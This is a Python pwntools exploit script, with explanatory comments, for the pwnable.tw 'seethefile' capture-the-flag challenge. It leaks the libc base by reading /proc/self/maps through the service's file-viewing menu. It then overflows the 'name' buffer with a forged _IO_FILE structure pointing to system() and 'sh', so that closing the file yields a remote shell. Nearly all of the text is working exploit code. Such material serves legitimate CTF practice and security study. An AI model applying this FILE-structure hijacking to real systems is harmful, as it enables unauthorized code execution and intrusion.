import glob
import os
import random
import signal
import struct
import sys
import time

from pwn import *
# Suffix appended to the per-run helper files this script drops in /tmp
# (gdb_symbols, gdb_pid, gdb_script); empty means fixed, unsuffixed names.
salt = ""
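def clear(signum=None, stack=None):
    """Remove this run's gdb helper files from /tmp and exit with status 0.

    Doubles as a signal handler: ``signum`` and ``stack`` are accepted and
    ignored so the function can be handed to ``signal.signal``. Only files
    whose names start with ``gdb_symbols``, ``gdb_pid`` or ``gdb_script``
    followed by the module-level ``salt`` are touched.
    """
    print('Strip all debugging information')
    # Expand the wildcard in-process and unlink each match rather than
    # handing a shell string to os.system: no shell is involved, so `salt`
    # can never be interpreted as shell syntax.
    for prefix in ('gdb_symbols', 'gdb_pid', 'gdb_script'):
        for path in glob.glob('/tmp/' + prefix + salt + '*'):
            try:
                os.remove(path)
            except OSError:
                # Same tolerance as `rm -f`: a file that vanished or cannot
                # be removed is not a reason to abort the cleanup.
                pass
    sys.exit(0)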
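# Write a C source file that an external gdb session can load for extra
# symbols. A failure to write is reported but never aborts the run.
try:
    gdb_symbols = ''' '''
    # Context manager: the handle is closed even if write() raises, where the
    # original open()/write()/close() chain leaked it on error.
    with open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') as f:
        f.write(gdb_symbols)
except Exception as e:
    print(e)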
# Target binary and pwntools context: 32-bit x86, verbose I/O logging.
execve_file = './seethefile'
context.update(arch="i386", log_level='debug')
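# Select exactly one target. The original spawned a local process and then
# immediately rebound `sh` to the remote connection, leaving the local child
# running unreferenced for the rest of the run; the switch keeps the
# effective behaviour (remote) without the stray process.
LOCAL = False
if LOCAL:
    sh = process(execve_file)
else:
    sh = remote('chall.pwnable.tw', 10200)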
# Symbol tables: the challenge binary and the libc build it was shipped with.
elf, libc = ELF(execve_file), ELF('./libc-2.23.so')
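# Drop the debuggee pid and a gdb command script in /tmp for an external gdb
# session to pick up. Each gdb command has to sit on its own line: a `#`
# comment runs to end of line, so `b _IO_new_fclose` is only honoured when it
# is not on the same line as the commented-out breakpoint.
try:
    gdbscript = '''
set $f=(struct _IO_FILE_plus **)&fp
# b *0x8048AFD
b _IO_new_fclose
'''
    # proc.pidof() is meaningful for a local process; against a remote
    # target it presumably fails here, and the except below just reports it
    # (the script file is then not written either, as in the original).
    with open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') as f:
        f.write(str(proc.pidof(sh)[0]))
    with open('/tmp/gdb_script{}'.replace('{}', salt), 'w') as f:
        f.write(gdbscript)
except Exception as e:
    print(e)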
# Menu walk-through. Option 1 takes a path of the client's choosing; feeding
# it /proc/self/maps turns the service's file-read feature into an ASLR leak
# of its own mappings. Options 2 and 3 are then issued twice; what each does
# is not visible here — presumably reading/displaying the opened file,
# confirm against the binary.
sh.sendlineafter('Your choice :', '1')
sh.sendlineafter('What do you want to see :', '/proc/self/maps')
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Your choice :', '3')
sh.sendlineafter('Your choice :', '2')
sh.sendlineafter('Your choice :', '3')
# Discard one line of output, then parse the start address (hex, up to '-')
# of the next maps entry. Presumably this is the first libc mapping, i.e.
# the libc base that symbol offsets are added to below — verify.
sh.recvline()
libc_addr = int(sh.recvuntil('-')[:-1], 16)
log.success('libc_addr: ' + hex(libc_addr))
# Fake structure to be planted in the binary's `name` buffer. The gdb script
# above inspects `fp` as `struct _IO_FILE_plus`, so this is laid out to be
# consumed as a FILE object: the resolved address of libc `system`, a
# pointer back into `name` (+0x28), and the "sh" string. Which FILE field
# each slot corresponds to is not derivable from this file alone.
# NOTE(review): u32() over str literals ('\x80\x80||', 'sh\0\0') and the
# '\0' padding below only work with Python 2 pwntools; Python 3 needs bytes.
layout = [
    0, 0,
    libc_addr + libc.symbols['system'],
    0, 0, 0, 0, 0,
    elf.symbols['name'] + 0x28,
    0,
    u32('\x80\x80||'),
    u32('sh\0\0'),
]
# Option 5 prompts for a name. The reply is the forged layout, zero-padded to
# 0x94 + 0x28 bytes, followed by the address of `name` itself (p32) —
# presumably overwriting a pointer that sits 0x94 + 0x28 bytes past the start
# of the buffer so that it refers to the data just written; confirm against
# the binary.
sh.sendlineafter('Your choice :', '5')
sh.sendlineafter('Leave your name :', flat(layout).ljust(0x94 + 0x28, '\0') + p32(elf.symbols['name']))
# Hand the connection to the user, then remove the /tmp helper files.
# clear() runs only if interactive() returns normally: an exception in
# between skips the cleanup and leaves the gdb_* files behind.
sh.interactive()
clear()